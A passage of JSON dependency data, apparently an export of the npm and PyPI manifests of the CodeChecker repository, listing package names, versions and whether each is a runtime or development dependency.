ptional":false},{"id":13878388601,"package_name":"sass","ecosystem":"npm","requirements":"1.32.13","direct":false,"kind":"development","optional":false},{"id":13878388602,"package_name":"sass-loader","ecosystem":"npm","requirements":"12.4.0","direct":false,"kind":"development","optional":false},{"id":13878388603,"package_name":"schema-utils","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388604,"package_name":"ajv-keywords","ecosystem":"npm","requirements":"5.1.0","direct":false,"kind":"development","optional":false},{"id":13878388605,"package_name":"secure-compare","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388606,"package_name":"select-hose","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388607,"package_name":"selenium-server","ecosystem":"npm","requirements":"3.141.59","direct":false,"kind":"development","optional":false},{"id":13878388608,"package_name":"selfsigned","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388609,"package_name":"semver","ecosystem":"npm","requirements":"5.7.1","direct":false,"kind":"development","optional":false},{"id":13878388610,"package_name":"send","ecosystem":"npm","requirements":"0.17.1","direct":false,"kind":"development","optional":false},{"id":13878388611,"package_name":"serialize-javascript","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388612,"package_name":"serve-index","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":13878388613,"package_name":"http-errors","ecosystem":"npm","requirements":"1.6.3","direct":false,"kind":"development","optional":false},{"id":13878388614,"package_name":"setprototypeof","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388615,"package_name":"serve-static","ecosystem":"npm","requirements":"1.14.1","direct":false,"kind":"development","optional":false},{"id":13878388616,"package_name":"set-blocking","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388617,"package_name":"setprototypeof","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388618,"package_name":"shallow-clone","ecosystem":"npm","requirements":"3.0.1","direct":false,"kind":"development","optional":false},{"id":13878388619,"package_name":"shebang-command","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388620,"package_name":"shebang-regex","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388621,"package_name":"side-channel","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388622,"package_name":"sigmund","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388623,"package_name":"signal-exit","ecosystem":"npm","requirements":"3.0.7","direct":false,"kind":"development","optional":false},{"id":13878388624,"package_name":"sisteransi","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878388625,"package_name":"slash","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388626,"package_name":"smart-buffer","ecosystem":"npm","requirements":"4.2.0","direct":false,"kind":"development","optional":false},{"id":13878388627,"package_name":"sockjs","ecosystem":"npm","requirements":"0.3.24","direct":false,"kind":"development","optional":false},{"id":13878388628,"package_name":"socks","ecosystem":"npm","requirements":"2.6.1","direct":false,"kind":"development","optional":false},{"id":13878388629,"package_name":"socks-proxy-agent","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":13878388630,"package_name":"source-map","ecosystem":"npm","requirements":"0.5.7","direct":false,"kind":"development","optional":false},{"id":13878388631,"package_name":"source-map-js","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388632,"package_name":"source-map-support","ecosystem":"npm","requirements":"0.5.21","direct":false,"kind":"development","optional":false},{"id":13878388633,"package_name":"spdy","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":13878388634,"package_name":"spdy-transport","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388635,"package_name":"readable-stream","ecosystem":"npm","requirements":"3.6.0","direct":false,"kind":"development","optional":false},{"id":13878388636,"package_name":"split","ecosystem":"npm","requirements":"0.3.3","direct":false,"kind":"development","optional":false},{"id":13878388637,"package_name":"splitpanes","ecosystem":"npm","requirements":"2.3.8","direct":false,"kind":"runtime","optional":false},{"id":13878388638,"package_name":"sprintf-js","ecosystem":"npm","requirements":"1.0.3","direct":false,"kind":"development","optional":false},{"id":13878388639,"package_name":"sshpk","ecosystem":"npm","requirements":"1.16.1","direct":false,"kind":"development","optional":false},{"id":13878388640,"package_name":"stack-utils","ecosystem":"npm","requirements":"2.0.5","direct":false,"kind":"development","optional":false},{"id":13878388641,"package_name":"escape-string-regexp","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388642,"package_name":"start-server-and-test","ecosystem":"npm","requirements":"1.14.0","direct":false,"kind":"development","optional":false},{"id":13878388643,"package_name":"debug","ecosystem":"npm","requirements":"4.3.2","direct":false,"kind":"development","optional":false},{"id":13878388644,"package_name":"statuses","ecosystem":"npm","requirements":"1.5.0","direct":false,"kind":"development","optional":false},{"id":13878388645,"package_name":"stealthy-require","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388646,"package_name":"stream-combiner","ecosystem":"npm","requirements":"0.0.4","direct":false,"kind":"development","optional":false},{"id":13878388647,"package_name":"string_decoder","ecosystem":"npm","requirements":"1.1.1","direct":false,"kind":"development","optional":false},{"id":13878388648,"package_name":"string-length","ecosystem":"npm","requirements":"4.0.2","direct":false,"kind":"development","optional":false},{"id":13878388649,"package_name":"string-width","ecosystem":"npm","requirements":"3.1.0","direct":false,"kind":"development","optional":false},{"id":13878388650,"package_name":"string.prototype.trimend","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388651,"package_name":"string.prototype.trimstart","ecosystem":"npm","requirements":"1.0.4","direct":false,"kind":"development","optional":false},{"id":13878388652,"package_name":"strip-ansi","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":13878388653,"package_name":"strip-bom","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388654,"package_name":"strip-final-newline","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388655,"package_name":"strip-json-comments","ecosystem":"npm","requirements":"3.1.1","direct":false,"kind":"development","optional":false},{"id":13878388656,"package_name":"supports-hyperlinks","ecosystem":"npm","requirements":"2.2.0","direct":false,"kind":"development","optional":false},{"id":13878388657,"package_name":"supports-preserve-symlinks-flag","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388658,"package_name":"tapable","ecosystem":"npm","requirements":"2.2.1","direct":false,"kind":"development","optional":false},{"id":13878388659,"package_name":"tar","ecosystem":"npm","requirements":"6.1.11","direct":false,"kind":"development","optional":false},{"id":13878388660,"package_name":"terminal-link","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388661,"package_name":"terser","ecosystem":"npm","requirements":"5.10.0","direct":false,"kind":"development","optional":false},{"id":13878388662,"package_name":"terser-webpack-plugin","ecosystem":"npm","requirements":"5.3.0","direct":false,"kind":"development","optional":false},{"id":13878388663,"package_name":"source-map","ecosystem":"npm","requirements":"0.7.3","direct":false,"kind":"development","optional":false},{"id":13878388664,"package_name":"test-exclude","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388665,"package_name":"text-table","ecosystem":"npm","requirements":"0.2.0","direct":false,"kind":"development","optional":false},{"id":13878388666,"package_name":"thrift","ecosystem":"npm","requirements":"0.13.0-hotfix.1","direct":false,"kind":"runtime","optional":false},{"id":13878388667,"package_name":"ws","ecosystem":"npm","requirements":"5.2.3","direct":false,"kind":"runtime","optional":false},{"id":13878388668,"package_name":"throat","ecosystem":"npm","requirements":"6.0.1","direct":false,"kind":"development","optional":false},{"id":13878388669,"package_name":"through","ecosystem":"npm","requirements":"2.3.8","direct":false,"kind":"development","optional":false},{"id":13878388670,"package_name":"thunky","ecosystem":"npm","requirements":"1.1.0","direct":false,"kind":"development","optional":false},{"id":13878388671,"package_name":"tmpl","ecosystem":"npm","requirements":"1.0.5","direct":false,"kind":"development","optional":false},{"id":13878388672,"package_name":"to-fast-properties","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388673,"package_name":"to-regex-range","ecosystem":"npm","requirements":"5.0.1","direct":false,"kind":"development","optional":false},{"id":13878388674,"package_name":"toidentifier","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388675,"package_name":"tslib","ecosystem":"npm","requirements":"1.13.0","direct":false,"kind":"development","optional":false},{"id":13878388676,"package_name":"tunnel-agent","ecosystem":"npm","requirements":"0.6.0","direct":false,"kind":"development","optional":false},{"id":13878388677,"package_name":"tweetnacl","ecosystem":"npm","requirements":"0.14.5","direct":false,"kind":"development","optional":false},{"id":13878388678,"package_name":"type-check","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":13878388679,"package_name":"type-detect","ecosystem":"npm","requirements":"4.0.8","direct":false,"kind":"development","optional":false},{"id":13878388680,"package_name":"type-fest","ecosystem":"npm","requirements":"0.21.3","direct":false,"kind":"development","optional":false},{"id":13878388681,"package_name":"type-is","ecosystem":"npm","requirements":"1.6.18","direct":false,"kind":"development","optional":false},{"id":13878388682,"package_name":"unbox-primitive","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388683,"package_name":"unicode-canonical-property-names-ecmascript","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388684,"package_name":"unicode-match-property-ecmascript","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388685,"package_name":"unicode-match-property-value-ecmascript","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388686,"package_name":"unicode-property-aliases-ecmascript","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388687,"package_name":"union","ecosystem":"npm","requirements":"0.5.0","direct":false,"kind":"development","optional":false},{"id":13878388688,"package_name":"universalify","ecosystem":"npm","requirements":"0.1.2","direct":false,"kind":"development","optional":false},{"id":13878388689,"package_name":"unpipe","ecosystem":"npm","requirements":"1.0.0","direct":false,"kind":"development","optional":false},{"id":13878388690,"package_name":"uri-js","ecosystem":"npm","requirements":"4.2.2","direct":false,"kind":"development","optional":false},{"id":13878388691,"package_name":"url-join","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388692,"package_name":"util","ecosystem":"npm","requirements":"0.12.4","direct":false,"kind":"development","optional":false},{"id":13878388693,"package_name":"util-deprecate","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388694,"package_name":"utila","ecosystem":"npm","requirements":"0.4.0","direct":false,"kind":"development","optional":false},{"id":13878388695,"package_name":"utils-merge","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388696,"package_name":"uuid","ecosystem":"npm","requirements":"8.3.2","direct":false,"kind":"development","optional":false},{"id":13878388697,"package_name":"v8-compile-cache","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388698,"package_name":"v8-to-istanbul","ecosystem":"npm","requirements":"9.0.1","direct":false,"kind":"development","optional":false},{"id":13878388699,"package_name":"vary","ecosystem":"npm","requirements":"1.1.2","direct":false,"kind":"development","optional":false},{"id":13878388700,"package_name":"verror","ecosystem":"npm","requirements":"1.10.0","direct":false,"kind":"development","optional":false},{"id":13878388701,"package_name":"vm2","ecosystem":"npm","requirements":"3.9.5","direct":false,"kind":"development","optional":false},{"id":13878388702,"package_name":"vue","ecosystem":"npm","requirements":"2.6.14","direct":false,"kind":"runtime","optional":false},{"id":13878388703,"package_name":"vue-chartjs","ecosystem":"npm","requirements":"3.5.1","direct":false,"kind":"runtime","optional":false},{"id":13878388704,"package_name":"vue-eslint-parser","ecosystem":"npm","requirements":"8.0.1","direct":false,"kind":"development","optional":false},{"id":13878388705,"package_name":"eslint-scope","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388706,"package_name":"vue-hot-reload-api","ecosystem":"npm","requirements":"2.3.4","direct":false,"kind":"development","optional":false},{"id":13878388707,"package_name":"vue-loader","ecosystem":"npm","requirements":"15.9.8","direct":false,"kind":"development","optional":false},{"id":13878388708,"package_name":"vue-router","ecosystem":"npm","requirements":"3.5.3","direct":false,"kind":"runtime","optional":false},{"id":13878388709,"package_name":"vue-style-loader","ecosystem":"npm","requirements":"4.1.3","direct":false,"kind":"development","optional":false},{"id":13878388710,"package_name":"vue-template-compiler","ecosystem":"npm","requirements":"2.6.14","direct":false,"kind":"development","optional":false},{"id":13878388711,"package_name":"vue-template-es2015-compiler","ecosystem":"npm","requirements":"1.9.1","direct":false,"kind":"development","optional":false},{"id":13878388712,"package_name":"vuetify","ecosystem":"npm","requirements":"2.6.15","direct":false,"kind":"runtime","optional":false},{"id":13878388713,"package_name":"vuetify-loader","ecosystem":"npm","requirements":"1.7.3","direct":false,"kind":"development","optional":false},{"id":13878388714,"package_name":"vuex","ecosystem":"npm","requirements":"3.6.2","direct":false,"kind":"runtime","optional":false},{"id":13878388715,"package_name":"wait-on","ecosystem":"npm","requirements":"6.0.0","direct":false,"kind":"development","optional":false},{"id":13878388716,"package_name":"walker","ecosystem":"npm","requirements":"1.0.8","direct":false,"kind":"development","optional":false},{"id":13878388717,"package_name":"watchpack","ecosystem":"npm","requirements":"2.4.0","direct":false,"kind":"development","optional":false},{"id":13878388718,"package_name":"wbuf","ecosystem":"npm","requirements":"1.7.3","direct":false,"kind":"development","optional":false},{"id":13878388719,"package_name":"wcwidth","ecosystem":"npm","requirements":"1.0.1","direct":false,"kind":"development","optional":false},{"id":13878388720,"package_name":"webpack","ecosystem":"npm","requirements":"5.76.0","direct":false,"kind":"development","optional":false},{"id":13878388721,"package_name":"webpack-cli","ecosystem":"npm","requirements":"4.9.1","direct":false,"kind":"development","optional":false},{"id":13878388722,"package_name":"commander","ecosystem":"npm","requirements":"7.2.0","direct":false,"kind":"development","optional":false},{"id":13878388723,"package_name":"webpack-dev-middleware","ecosystem":"npm","requirements":"5.3.0","direct":false,"kind":"development","optional":false},{"id":13878388724,"package_name":"webpack-dev-server","ecosystem":"npm","requirements":"4.7.3","direct":false,"kind":"development","optional":false},{"id":13878388725,"package_name":"ipaddr.js","ecosystem":"npm","requirements":"2.0.1","direct":false,"kind":"development","optional":false},{"id":13878388726,"package_name":"strip-ansi","ecosystem":"npm","requirements":"7.0.1","direct":false,"kind":"development","optional":false},{"id":13878388727,"package_name":"ws","ecosystem":"npm","requirements":"8.4.2","direct":false,"kind":"development","optional":false},{"id":13878388728,"package_name":"webpack-merge","ecosystem":"npm","requirements":"5.8.0","direct":false,"kind":"development","optional":false},{"id":13878388729,"package_name":"webpack-sources","ecosystem":"npm","requirements":"3.2.3","direct":false,"kind":"development","optional":false},{"id":13878388730,"package_name":"eslint-scope","ecosystem":"npm","requirements":"5.1.1","direct":false,"kind":"development","optional":false},{"id":13878388731,"package_name":"websocket-driver","ecosystem":"npm","requirements":"0.7.4","direct":false,"kind":"development","optional":false},{"id":13878388732,"package_name":"websocket-extensions","ecosystem":"npm","requirements":"0.1.4","direct":false,"kind":"development","optional":false},{"id":13878388733,"package_name":"whatwg-encoding","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388734,"package_name":"iconv-lite","ecosystem":"npm","requirements":"0.6.3","direct":false,"kind":"development","optional":false},{"id":13878388735,"package_name":"which","ecosystem":"npm","requirements":"2.0.2","direct":false,"kind":"development","optional":false},{"id":13878388736,"package_name":"which-boxed-primitive","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388737,"package_name":"which-module","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388738,"package_name":"which-typed-array","ecosystem":"npm","requirements":"1.1.7","direct":false,"kind":"development","optional":false},{"id":13878388739,"package_name":"wide-align","ecosystem":"npm","requirements":"1.1.3","direct":false,"kind":"development","optional":false},{"id":13878388740,"package_name":"ansi-regex","ecosystem":"npm","requirements":"3.0.0","direct":false,"kind":"development","optional":false},{"id":13878388741,"package_name":"string-width","ecosystem":"npm","requirements":"2.1.1","direct":false,"kind":"development","optional":false},{"id":13878388742,"package_name":"strip-ansi","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388743,"package_name":"wildcard","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388744,"package_name":"word-wrap","ecosystem":"npm","requirements":"1.2.5","direct":false,"kind":"development","optional":false},{"id":13878388745,"package_name":"wrap-ansi","ecosystem":"npm","requirements":"7.0.0","direct":false,"kind":"development","optional":false},{"id":13878388746,"package_name":"wrappy","ecosystem":"npm","requirements":"1.0.2","direct":false,"kind":"development","optional":false},{"id":13878388747,"package_name":"write-file-atomic","ecosystem":"npm","requirements":"4.0.1","direct":false,"kind":"development","optional":false},{"id":13878388748,"package_name":"xregexp","ecosystem":"npm","requirements":"2.0.0","direct":false,"kind":"development","optional":false},{"id":13878388749,"package_name":"y18n","ecosystem":"npm","requirements":"4.0.0","direct":false,"kind":"development","optional":false},{"id":13878388750,"package_name":"yallist","ecosystem":"npm","requirements":"2.1.2","direct":false,"kind":"development","optional":false},{"id":13878388751,"package_name":"yargs","ecosystem":"npm","requirements":"17.5.1","direct":false,"kind":"development","optional":false},{"id":13878388752,"package_name":"yargs-parser","ecosystem":"npm","requirements":"21.0.1","direct":false,"kind":"development","optional":false},{"id":13878388753,"package_name":"yargs-unparser","ecosystem":"npm","requirements":"1.6.0","direct":false,"kind":"development","optional":false},{"id":13878388754,"package_name":"y18n","ecosystem":"npm","requirements":"5.0.8","direct":false,"kind":"development","optional":false}]},{"ecosystem":"npm","filepath":"web/server/vue-cli/package.json","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:10.784Z","updated_at":"2023-09-22T16:47:10.784Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/server/vue-cli/package.json","dependencies":[{"id":13878388771,"package_name":"@mdi/font","ecosystem":"npm","requirements":"^6.5.95","direct":true,"kind":"runtime","optional":false},{"id":13878388772,"package_name":"chart.js","ecosystem":"npm","requirements":"^2.9.4","direct":true,"kind":"runtime","optional":false},{"id":13878388773,"package_name":"chartjs-plugin-datalabels","ecosystem":"npm","requirements":"^0.7.0","direct":true,"kind":"runtime","optional":false},{"id":13878388774,"package_name":"codechecker-api","ecosystem":"npm","requirements":"file:../../api/js/codechecker-api-node/dist/codechecker-api-6.53.0.tgz","direct":true,"kind":"runtime","optional":false},{"id":13878388775,"package_name":"codemirror","ecosystem":"npm","requirements":"^5.65.0","direct":true,"kind":"runtime","optional":false},{"id":13878388776,"package_name":"date-fns","ecosystem":"npm","requirements":"^2.28.0","direct":true,"kind":"runtime","optional":false},{"id":13878388777,"package_name":"js-cookie","ecosystem":"npm","requirements":"^3.0.1","direct":true,"kind":"runtime","optional":false},{"id":13878388778,"package_name":"jsplumb","ecosystem":"npm","requirements":"^2.15.6","direct":true,"kind":"runtime","optional":false},{"id":13878388779,"package_name":"lodash","ecosystem":"npm","requirements":"^4.17.21","direct":true,"kind":"runtime","optional":false},{"id":13878388780,"package_name":"marked","ecosystem":"npm","requirements":"^4.0.10","direct":true,"kind":"runtime","optional":false},{"id":13878388781,"package_name":"splitpanes","ecosystem":"npm","requirements":"^2.3.8","direct":true,"kind":"runtime","optional":false},{"id":13878388782,"package_name":"vue","ecosystem":"npm","requirements":"^2.6.14","direct":true,"kind":"runtime","optional":false},{"id":13878388783,"package_name":"vue-chartjs","ecosystem":"npm","requirements":"^3.5.1","direct":true,"kind":"runtime","optional":false},{"id":13878388784,"package_name":"vue-router","ecosystem":"npm","requirements":"^3.5.3","direct":true,"kind":"runtime","optional":false},{"id":13878388785,"package_name":"vuetify","ecosystem":"npm","requirements":"^2.6.10","direct":true,"kind":"runtime","optional":false},{"id":13878388786,"package_name":"vuex","ecosystem":"npm","requirements":"^3.6.2","direct":true,"kind":"runtime","optional":false},{"id":13878388787,"package_name":"@babel/cli","ecosystem":"npm","requirements":"^7.16.8","direct":true,"kind":"development","optional":false},{"id":13878388788,"package_name":"@babel/core","ecosystem":"npm","requirements":"^7.16.7","direct":true,"kind":"development","optional":false},{"id":13878388789,"package_name":"@babel/preset-env","ecosystem":"npm","requirements":"^7.16.8","direct":true,"kind":"development","optional":false},{"id":13878388790,"package_name":"@types/jest","ecosystem":"npm","requirements":"^27.4.0","direct":true,"kind":"development","optional":false},{"id":13878388791,"package_name":"@vue/test-utils","ecosystem":"npm","requirements":"^1.3.0","direct":true,"kind":"development","optional":false},{"id":13878388792,"package_name":"@vue/vue2-jest","ecosystem":"npm","requirements":"^28.0.0","direct":true,"kind":"development","optional":false},{"id":13878388793,"package_name":"babel-core","ecosystem":"npm","requirements":"^7.0.0-bridge.0","direct":true,"kind":"development","optional":false},{"id":13878388794,"package_name":"babel-eslint","ecosystem":"npm","requirements":"^10.1.0","direct":true,"kind":"development","optional":false},{"id":13878388795,"package_name":"babel-jest","ecosystem":"npm","requirements":"^28.1.1","direct":true,"kind":"development","optional":false},{"id":13878388796,"package_name":"babel-loader","ecosystem":"npm","requirements":"^8.2.3","direct":true,"kind":"development","optional":false},{"id":13878388797,"package_name":"buffer","ecosystem":"npm","requirements":"^6.0.3","direct":true,"kind":"development","optional":false},{"id":13878388798,"package_name":"copy-webpack-plugin","ecosystem":"npm","requirements":"^10.2.0","direct":true,"kind":"development","optional":false},{"id":13878388799,"package_name":"core-js","ecosystem":"npm","requirements":"^3.20.3","direct":true,"kind":"development","optional":false},{"id":13878388800,"package_name":"cross-env","ecosystem":"npm","requirements":"^7.0.3","direct":true,"kind":"development","optional":false},{"id":13878388801,"package_name":"css-loader","ecosystem":"npm","requirements":"^6.5.1","direct":true,"kind":"development","optional":false},{"id":13878388802,"package_name":"deepmerge","ecosystem":"npm","requirements":"^4.2.2","direct":true,"kind":"development","optional":false},{"id":13878388803,"package_name":"eslint","ecosystem":"npm","requirements":"^8.7.0","direct":true,"kind":"development","optional":false},{"id":13878388804,"package_name":"eslint-plugin-vue","ecosystem":"npm","requirements":"^8.3.0","direct":true,"kind":"development","optional":false},{"id":13878388805,"package_name":"eslint-webpack-plugin","ecosystem":"npm","requirements":"^3.1.1","direct":true,"kind":"development","optional":false},{"id":13878388806,"package_name":"file-loader","ecosystem":"npm","requirements":"^6.2.0","direct":true,"kind":"development","optional":false},{"id":13878388807,"package_name":"geckodriver","ecosystem":"npm","requirements":"^3.0.1","direct":true,"kind":"development","optional":false},{"id":13878388808,"package_name":"html-webpack-plugin","ecosystem":"npm","requirements":"^5.5.0","direct":true,"kind":"development","optional":false},{"id":13878388809,"package_name":"http-server","ecosystem":"npm","requirements":"^14.1.0","direct":true,"kind":"development","optional":false},{"id":13878388810,"package_name":"jest","ecosystem":"npm","requirements":"^28.1.1","direct":true,"kind":"development","optional":false},{"id":13878388811,"package_name":"nightwatch","ecosystem":"npm","requirements":"^1.7.13","direct":true,"kind":"development","optional":false},{"id":13878388812,"package_name":"raw-loader","ecosystem":"npm","requirements":"^4.0.2","direct":true,"kind":"development","optional":false},{"id":13878388813,"package_name":"regenerator-runtime","ecosystem":"npm","requirements":"^0.13.9","direct":true,"kind":"development","optional":false},{"id":13878388814,"package_name":"rimraf","ecosystem":"npm","requirements":"^3.0.2","direct":true,"kind":"development","optional":false},{"id":13878388815,"package_name":"sass","ecosystem":"npm","requirements":"~1.32.13","direct":true,"kind":"development","optional":false},{"id":13878388816,"package_name":"sass-loader","ecosystem":"npm","requirements":"^12.4.0","direct":true,"kind":"development","optional":false},{"id":13878388817,"package_name":"selenium-server","ecosystem":"npm","requirements":"^3.141.59","direct":true,"kind":"development","optional":false},{"id":13878388818,"package_name":"start-server-and-test","ecosystem":"npm","requirements":"^1.14.0","direct":true,"kind":"development","optional":false},{"id":13878388819,"package_name":"util","ecosystem":"npm","requirements":"^0.12.4","direct":true,"kind":"development","optional":false},{"id":13878388820,"package_name":"vue-loader","ecosystem":"npm","requirements":"^15.9.8","direct":true,"kind":"development","optional":false},{"id":13878388821,"package_name":"vue-style-loader","ecosystem":"npm","requirements":"^4.1.3","direct":true,"kind":"development","optional":false},{"id":13878388822,"package_name":"vue-template-compiler","ecosystem":"npm","requirements":"^2.6.14","direct":true,"kind":"development","optional":false},{"id":13878388823,"package_name":"vuetify-loader","ecosystem":"npm","requirements":"^1.7.3","direct":true,"kind":"development","optional":false},{"id":13878388824,"package_name":"webpack","ecosystem":"npm","requirements":"^5.76.0","direct":true,"kind":"development","optional":false},{"id":13878388825,"package_name":"webpack-cli","ecosystem":"npm","requirements":"^4.9.1","direct":true,"kind":"development","optional":false},{"id":13878388826,"package_name":"webpack-dev-server","ecosystem":"npm","requirements":"^4.7.3","direct":true,"kind":"development","optional":false},{"id":13878388827,"package_name":"webpack-merge","ecosystem":"npm","requirements":"^5.8.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"nuget","filepath":"tools/report-converter/tests/unit/analyzers/roslynator_output_test_files/files/files.csproj","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:12.290Z","updated_at":"2023-09-22T16:47:12.290Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/report-converter/tests/unit/analyzers/roslynator_output_test_files/files/files.csproj","dependencies":[]},{"ecosystem":"pypi","filepath":"analyzer/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:13.296Z","updated_at":"2023-09-22T16:47:13.296Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/requirements.txt","dependencies":[{"id":13878388844,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878388845,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false},{"id":13878388846,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878388847,"package_name":"PyYAML","ecosystem":"pypi","requirements":"==6.0.1","direct":true,"kind":"runtime","optional":false},{"id":13878388848,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:14.698Z","updated_at":"2023-09-22T16:47:14.698Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/requirements_py/dev/requirements.txt","dependencies":[{"id":13878388860,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"development","optional":false},{"id":13878388861,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878388862,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.7.0","direct":true,"kind":"development","optional":false},{"id":13878388863,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"development","optional":false},{"id":13878388864,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"development","optional":false},{"id":13878388865,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false},{"id":13878388866,"package_name":"mkdocs","ecosystem":"pypi","requirements":"==1.2.3","direct":true,"kind":"development","optional":false},{"id":13878388867,"package_name":"PyYAML","ecosystem":"pypi","requirements":"==6.0.1","direct":true,"kind":"development","optional":false},{"id":13878388868,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false},{"id":13878388869,"package_name":"coverage","ecosystem":"pypi","requirements":"==5.5.0","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/requirements_py/osx/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:15.899Z","updated_at":"2023-09-22T16:47:15.899Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/requirements_py/osx/requirements.txt","dependencies":[{"id":13878388881,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878388882,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false},{"id":13878388883,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878388884,"package_name":"scan-build","ecosystem":"pypi","requirements":"==2.0.19","direct":true,"kind":"runtime","optional":false},{"id":13878388885,"package_name":"PyYAML","ecosystem":"pypi","requirements":"==6.0.1","direct":true,"kind":"runtime","optional":false},{"id":13878388886,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/tools/build-logger/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:17.270Z","updated_at":"2023-09-22T16:47:17.270Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/tools/build-logger/requirements_py/dev/requirements.txt","dependencies":[{"id":13878388891,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878388892,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.4.0","direct":true,"ki